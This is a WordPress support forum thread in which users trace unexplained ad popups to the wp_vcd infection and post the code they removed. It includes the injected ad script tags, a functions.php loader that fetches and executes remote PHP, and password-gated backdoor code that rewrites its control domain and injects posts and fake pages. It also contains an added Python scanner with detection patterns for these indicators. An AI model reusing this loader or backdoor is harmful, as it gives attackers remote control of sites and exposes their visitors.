• Resolved carlostorch

    (@carlostorch)


    Hi.

    I’m working on a new site, installing plugins and customizing it.

    The problem is, since yesterday, many times when I click on menu items or other areas on the site, ad popups appear and I have no idea where they are coming from.

    I can see the popup window’s address starts with the onclkds.com domain before it redirects to some random address with random ads.

    I’ve tried scanning the site with anti-malware plugins like Quttera and Wordfence, to no avail.

    I’ve tried with different browsers and computers, and the popup appears in all of them, so it is not my PC that has the problem.

    I hope someone can help with this. I’ve been working on this site for 15 days, starting over would kill me, and I’m not sure if this thing would attack the site again.

Viewing 15 replies - 1 through 15 (of 23 total)
  • And your website url is…?

    Thread Starter carlostorch

    (@carlostorch)

    it’s https://distribuidoramundialcr.com

    thanks for replying

    I have a NoScript addon in my browser so I can see that there are three scripts that are loaded, one from jsdelivr.net, one from mobisla.com and one from pub2srv.com

    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>

    And this one that looks like legit one
    <script type='text/javascript' src='https://cdn.jsdelivr.net/wp/wp-slimstat/tags/4.6.4/wp-slimstat.min.js'></script>

    IMHO, you should check what these two are doing and how they got in.

    And then there’s THIS

    https://sitecheck.sucuri.net/results/distribuidoramundialcr.com/

    You have some job to do.

    • This reply was modified 7 years, 7 months ago by sinip.
    Thread Starter carlostorch

    (@carlostorch)

    Thanks for shedding some light.

    I downloaded a full copy of the site (only files, not the database) and searched every file for “mobisla.com” and “mobisla.com” text using Notepad++, trying to locate part of the code you found, but I got nothing.

    “jsdelivr.net” was found in a few files though.

    Any idea where else to look for these weird scripts?

    Database?

    Could be encoded as well.

    Try to install this and see what happens – https://www.ads-software.com/plugins/exploit-scanner/

    • This reply was modified 7 years, 7 months ago by sinip.
    Thread Starter carlostorch

    (@carlostorch)

    I’m looking for a way to search specific text within database . Never did it before. If you have one please let me know.

    The easiest one is to download the database from within phpMyAdmin and then open it in Notepad++.

    Thread Starter carlostorch

    (@carlostorch)

    I tried that initially but noticed many weird characters in the file, and thought I was doing something wrong.

    Anyhow, I searched within the .sql file for “pub2srv”, nothing was found.
    Then searched for “mobisla” and got 1 result, here’s the part of the code where it’s seen:

    ','a:9:{s:10:\"search_for\";s:7:\"mobisla\";s:12:\"replace_with\";s:0:\"\";s:7:\"dry_run\";s:2:\"on\";s:16:\"case_insensitive\";s:3:\"off\";s:13:\"replace_guids

    I’m really confused about where that code is coming from

    Hi,

    Slimstat support here. JsDelivr is the CDN network used to serve our Javascript tracker. This feature can be deactivated in the settings, if you think your site will be safer by serving the tracker from your own servers. However, of course we DO NOT add any popups or anything like that. So you may want to look at your other scripts.

    Cheers,
    Jason

    Thread Starter carlostorch

    (@carlostorch)

    Firstly, thanks Jason for your input. I disabled Slimstat to do my testing but the problem persisted, so I enabled your nice tool back.

    Secondly, Sinip, you’re a life saver! I got rid of that nasty script, thanks to the code you provided, which allowed me to look further.

    This might help someone else so I’m leaving the fix:

    I removed this code from my functions.php theme file:

    if ( ! function_exists( 'wp_temp_setup' ) ) {
        // Current host + request path, sent to the remote server so the payload can be chosen per page.
        // REQUEST_URI is used as a bare constant here, as in the injected original; PHP falls back to the string.
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];

        // Download PHP source from the remote server on every request; errors are silenced with @.
        if ( $tmpcontent = @file_get_contents( "https://www.aotson.com/code.php?i=" . $path ) ) {

            // Write the downloaded code to a temp file, include (execute) it, delete the file,
            // and hand back every variable it defined.
            function wp_temp_setup( $phpCode ) {
                $tmpfname = tempnam( sys_get_temp_dir(), "wp_temp_setup" );
                $handle   = fopen( $tmpfname, "w+" );
                fwrite( $handle, "<?php\n" . $phpCode );
                fclose( $handle );
                include $tmpfname;
                unlink( $tmpfname );
                return get_defined_vars();
            }

            // Pull the remote code's variables into the theme's scope.
            extract( wp_temp_setup( $tmpcontent ) );
        }
    }

    and the problem is gone!

    I checked again here and is looking fine so far https://sitecheck.sucuri.net/results/distribuidoramundialcr.com/

    I wish I knew how that code got there, though.

    Thanks guys for giving away some of your valuable time to help others.

    • This reply was modified 7 years, 7 months ago by carlostorch.
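    Why the earlier file search for the ad domains came up empty: the block removed from functions.php never contains mobisla.com or pub2srv.com. It downloads PHP from the remote server on each request, executes it from a temp file and deletes that file, so the ad markup only ever exists in memory. The following scanner is an added example, not code from this thread or from any of the plugins mentioned in it; it looks for the loader pattern and the wp_vcd control markers instead of the ad domains, and runs against a constructed sample tree (the attacker host, file names and password are placeholders).

```python
import os
import re
import shutil
import tempfile

# Indicators taken from the code quoted in this thread. None of them is the ad
# domain: the downloader never contains it, so this looks for the loader and the
# wp_vcd control code instead.
INDICATORS = {
    "remote_fetch": re.compile(r"@?file_get_contents\(\s*[\"']https?://", re.I),
    "temp_include": re.compile(r"tempnam\s*\(\s*sys_get_temp_dir\s*\(\s*\)", re.I),
    "extract_remote_vars": re.compile(r"extract\s*\(\s*wp_temp_setup", re.I),
    "wp_vcd_marker": re.compile(r"wp_vcd|wp_cd_code|ERROR_WP_ACTION", re.I),
    "password_gate": re.compile(r"\$_REQUEST\[['\"]password['\"]\]\s*==\s*['\"][0-9a-f]{32}['\"]", re.I),
}

SCAN_EXTENSIONS = (".php", ".html", ".js")


def scan_text(text):
    """Names of the indicators present in one file's contents, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root):
    """Map each suspicious file (relative path, '/' separated) to its indicators.

    A file is reported only when two or more indicators match, so a plugin that
    merely fetches a URL with file_get_contents() is not flagged on its own.
    """
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
            except OSError:
                continue
            if len(hits) >= 2:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed samples, not files from the reporter's site: a clean theme file,
# a functions.php carrying the downloader block, and a file carrying the
# wp_vcd password gate. The remote host and the password are placeholders.
CLEAN_FILE = "<?php\nadd_action('wp_enqueue_scripts', 'theme_scripts');\n"
DROPPER_FILE = (
    "<?php\nif ( ! function_exists( 'wp_temp_setup' ) ) {\n"
    "$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];\n"
    "if($tmpcontent = @file_get_contents(\"https://attacker.invalid/code.php?i=\".$path)) {\n"
    "function wp_temp_setup($phpCode) {\n"
    "$tmpfname = tempnam(sys_get_temp_dir(), \"wp_temp_setup\");\n"
    "include $tmpfname; return get_defined_vars(); }\n"
    "extract(wp_temp_setup($tmpcontent)); } }\n"
)
BACKDOOR_FILE = (
    "<?php\nif (isset($_REQUEST['password']) && ($_REQUEST['password'] == "
    "'0123456789abcdef0123456789abcdef')) { $div_code_name=\"wp_vcd\"; die(''); }\n"
)


def demo():
    """Write the samples into a throwaway WordPress-like tree, scan it, clean up."""
    root = tempfile.mkdtemp(prefix="wp_scan_demo_")
    try:
        theme = os.path.join(root, "wp-content", "themes", "mytheme")
        includes = os.path.join(root, "wp-includes")
        os.makedirs(theme)
        os.makedirs(includes)
        for path, body in (
            (os.path.join(theme, "functions.php"), DROPPER_FILE),
            (os.path.join(theme, "header.php"), CLEAN_FILE),
            (os.path.join(includes, "class.wp.php"), BACKDOOR_FILE),
        ):
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

    Point scan_tree() at a downloaded copy of the site root; every file it reports should be compared against a fresh copy of the same theme or plugin, since the loader is appended to otherwise legitimate files such as functions.php.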

    Nice to see that you’ve sorted it out while I’m having my morning coffee.

    I’m having this same issue. I have checked the lines of code @carlostorch posted earlier but they don’t seem to be the same as mine. Please, how do I fix this error? My website is alummata.com. Thanks.

    The same problem happened to my site. I tried to search for the solution on the web and tried step by step to resolve it, but it failed. Finally I found this conversation and tried removing the code in public_html/wp-content/themes/your active theme/functions.php:

    if ( ! function_exists( 'wp_temp_setup' ) ) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        // Skip 404s, cron and XML-RPC requests so the injected content only appears on ordinary page views
        // (loose == false comparisons as in the original).
        if ( ! is_404() && stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
            // Download PHP source for this host + path from the remote server; errors are silenced with @.
            if ( $tmpcontent = @file_get_contents( "https://www.dolsh.com/code4.php?i=" . $path ) ) {
                // Write the downloaded code to a temp file, include (execute) it, delete the file,
                // and hand back every variable it defined.
                function wp_temp_setup( $phpCode ) {
                    $tmpfname = tempnam( sys_get_temp_dir(), "wp_temp_setup" );
                    $handle   = fopen( $tmpfname, "w+" );
                    fwrite( $handle, "<?php\n" . $phpCode );
                    fclose( $handle );
                    include $tmpfname;
                    unlink( $tmpfname );
                    return get_defined_vars();
                }
                // Pull the remote code's variables into the theme's scope.
                extract( wp_temp_setup( $tmpcontent ) );
            }
        }
    }

    The site works well and loads fast in the admin panel.

    Thanks.

    I also have the same problem. I found it in functions.php and I’ve deleted the code you showed above. But I’m curious about this code, can anyone explain to me what it is for? Because it looks the same as the code I’ve deleted.

    <?php

    // Password-gated remote control: only requests carrying the hard-coded 32-hex-character password are handled.
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd279b04c68acf3ccd6cf3270727d84fd'))
    {
        $div_code_name = "wp_vcd";
        switch ($_REQUEST['action'])
        {
            // 'change_domain': rewrite this file on disk so the downloader points at a new remote host.
            case 'change_domain':
                if (isset($_REQUEST['newdomain']))
                {
                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            // Find the host currently used in the file_get_contents("http://.../code4.php ...) loader line.
                            if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain))
                            {
                                // Replace the old host with the supplied one and overwrite this file.
                                $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
            break;

            default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }

        die("");
    }

    ?>

    And here is another one, the same, in theme-functions.php:

    <?php

    // Same password gate as above; this copy carries the content-injection actions.
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd279b04c68acf3ccd6cf3270727d84fd'))
    {
        switch ($_REQUEST['action'])
        {
            // 'get_all_links': list every published post together with any markup already injected into it.
            case 'get_all_links':
                foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                {
                    $data['code'] = '';

                    // Injected markup lives inside a <div id="wp_cd_code"> wrapper in post_content.
                    if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                    {
                        $data['code'] = $_[1];
                    }

                    print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                }
            break;

            // 'set_id_links': replace (or, with empty data, remove) the injected block in one post.
            case 'set_id_links':
                if (isset($_REQUEST['data']))
                {
                    $data = $wpdb->get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"');

                    $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data->post_content);
                    if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                    if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                    {
                        print "true";
                    }
                }
            break;

            // 'create_page': add or remove a fake page in the attacker's own {prefix}datalist table, keyed by URL.
            case 'create_page':
                if (isset($_REQUEST['remove_page']))
                {
                    if ($wpdb->query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/' . mysql_escape_string($_REQUEST['url']) . '"'))
                    {
                        print "true";
                    }
                }
                elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                {
                    if ($wpdb->query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/' . mysql_escape_string($_REQUEST['url']) . '", '
                        . '`title` = "' . mysql_escape_string($_REQUEST['title']) . '", '
                        . '`keywords` = "' . mysql_escape_string($_REQUEST['keywords']) . '", '
                        . '`description` = "' . mysql_escape_string($_REQUEST['description']) . '", '
                        . '`content` = "' . mysql_escape_string($_REQUEST['content']) . '", '
                        . '`full_content` = "' . mysql_escape_string($_REQUEST['full_content']) . '" '
                        . 'ON DUPLICATE KEY UPDATE `title` = "' . mysql_escape_string($_REQUEST['title']) . '", '
                        . '`keywords` = "' . mysql_escape_string($_REQUEST['keywords']) . '", '
                        . '`description` = "' . mysql_escape_string($_REQUEST['description']) . '", '
                        . '`content` = "' . mysql_escape_string(urldecode($_REQUEST['content'])) . '", '
                        . '`full_content` = "' . mysql_escape_string($_REQUEST['full_content']) . '"'))
                    {
                        print "true";
                    }
                }
            break;

            default: print "ERROR_WP_ACTION WP_URL_CD";
        }

        die("");
    }

    // On every request: if the URL matches a row in {prefix}datalist, serve the stored fake page instead of WordPress.
    if ($wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "' . mysql_escape_string($_SERVER['REQUEST_URI']) . '"') == '1')
    {
        $data = $wpdb->get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "' . mysql_escape_string($_SERVER['REQUEST_URI']) . '"');
        if ($data->full_content)
        {
            print stripslashes($data->content);
        }
        else
        // (the pasted code ends here)
    I got a similar problem.
    I have the two same scripts included in my webpages:

    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script> 
    
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>

    But I do not have any class.wp.php or wp-vcd.php files in my WordPress installation. I tried deactivating every plugin and theme, but nothing. Nothing at the beginning of my functions.php file either. Any hint? Anti-Malware doesn’t find anything.

    The weirdest thing is that some users have the adware, and some don’t!

  • The topic ‘unknown ad popups on my wp website’ is closed to new replies.